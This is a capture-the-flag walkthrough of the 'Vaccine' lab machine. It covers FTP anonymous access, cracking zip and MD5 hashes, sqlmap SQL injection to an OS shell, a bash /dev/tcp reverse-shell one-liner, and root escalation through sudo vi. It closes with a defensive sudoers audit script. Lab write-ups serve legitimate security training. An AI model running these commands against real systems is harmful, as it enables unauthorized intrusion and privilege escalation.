# Vaccine

## Initial Scan

```bash
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
```

<figure><img src="/files/lcIoR8Pe9jSHtCnjk3TZ" alt=""><figcaption></figcaption></figure>

## Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

## Task 2

This service can be configured to allow login with any password for a specific username. What is that username?

Answer: anonymous

## Task 3

What is the name of the file downloaded over this service?

```
ftp 10.129.248.153
```

<figure><img src="/files/oDoryhhAb6NJ1tUUUbID" alt=""><figcaption></figcaption></figure>

Answer: backup.zip

## Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

<figure><img src="/files/jSu5lipZyWYcNBiLp9Vi" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dYN4KZHvgCDgcSFNRW1K" alt=""><figcaption></figcaption></figure>

Answer: zip2john

## Task 5

What is the password for the admin user on the website?

<figure><img src="/files/nsz4e7T9V6eay0pRFuJH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Fnbnr4hN5MJaYrFiaiVx" alt=""><figcaption></figcaption></figure>

backup.zip password: `41852963`

<figure><img src="/files/qyX2SoiKmANje97teBh8" alt=""><figcaption></figcaption></figure>

Looking at index.html

<figure><img src="/files/yxfebT1GMO5DFsuGPWLb" alt=""><figcaption></figcaption></figure>

Put the hash in a file and crack it with hashcat:

```bash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/SqnoZS9VZQ6Nl4O6c6Lo" alt=""><figcaption></figcaption></figure>

Answer: qwerty789

## Task 6

What option can be passed to sqlmap to try to get command execution via the SQL injection?

Looking at `sqlmap -h`:

<figure><img src="/files/5eGC0dA8dbKxihmXjxi0" alt=""><figcaption></figcaption></figure>

Answer: --os-shell

## Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the Website.

<figure><img src="/files/9GyhxRCwFkW97aya5xvD" alt=""><figcaption></figcaption></figure>

```bash
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
```

We get our shell.

<figure><img src="/files/WqfcxW5CFmcXupO57u3e" alt=""><figcaption></figcaption></figure>

Start the listener, then run:

```
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
```

<figure><img src="/files/aXwEWj1615HikxHfTThd" alt=""><figcaption></figcaption></figure>

Answer: vi

## Task 8

Submit user flag

<figure><img src="/files/Nfz8K6moQytYHd3NFfb2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aIJGTMJh6Ujl6aBrNstY" alt=""><figcaption></figcaption></figure>

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

## Task 9

Submit root flag

Looking at the files in /var/www/html, since the site uses PHP. In the dashboard.php file we see:

<figure><img src="/files/kkl4Ezkk4in3cxgCaNFG" alt=""><figcaption></figcaption></figure>

`user=postgres password=P@s5w0rd!`

<figure><img src="/files/zhJzbFf6Y4XqWggu9CgE" alt=""><figcaption></figcaption></figure>

Looking at various options on [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo)

<figure><img src="/files/wC3OSNBwocGQ4nOtgKqa" alt=""><figcaption></figcaption></figure>

Open a file with `sudo vi` (something we could only do as sudo), then type:

```
:set shell=/bin/sh
ENTER
:shell
ENTER
```

<figure><img src="/files/AXp9hyg1exJEnXPh7y3B" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TazSdcSexiGmOcH5yD7C" alt=""><figcaption></figcaption></figure>

Answer: dd6e058e814260bc70e9bbdef2715849
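A defensive counterpart to the `sudo vi` step above, as an added example that is not part of the original walkthrough: a small Python audit that flags sudoers rules granting editors or pagers that can spawn a shell. The sudoers lines, the `audit_sudoers` name and the program list are assumptions constructed for illustration.

```python
import re

# Programs that can spawn a shell or run commands from inside their UI
# (a small hand-picked subset of what GTFOBins documents for sudo).
SHELL_ESCAPE = {"vi", "vim", "view", "nano", "less", "more", "man", "ed", "awk", "find"}

# Constructed sample sudoers entries, not taken from the box.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
postgres ALL=(ALL) /bin/vi /etc/example/app.conf
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/app.log
deploy   ALL=(root) sudoedit /etc/example/app.conf
"""

# user  host = (run-as) command[, command...]
RULE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, run-as, command) for each rule granting a shell-escape program."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"
        for cmd in m.group("cmds").split(","):
            # Strip tags such as NOPASSWD: in front of the command path.
            # Limitation: a NOEXEC: tag is not evaluated, so review flagged rules by hand.
            cmd = re.sub(r"^(?:\s*[A-Z_]+:\s*)+", "", cmd).strip()
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE:
                findings.append((m.group("who"), runas, cmd))
    return findings

if __name__ == "__main__":
    for who, runas, cmd in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who} may run '{cmd}' as {runas}: it can spawn a shell; "
              "prefer sudoedit for file edits")
```

The `deploy` rule is not flagged because `sudoedit` copies the file and runs the editor as the invoking user, so a shell spawned from the editor is not a root shell.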

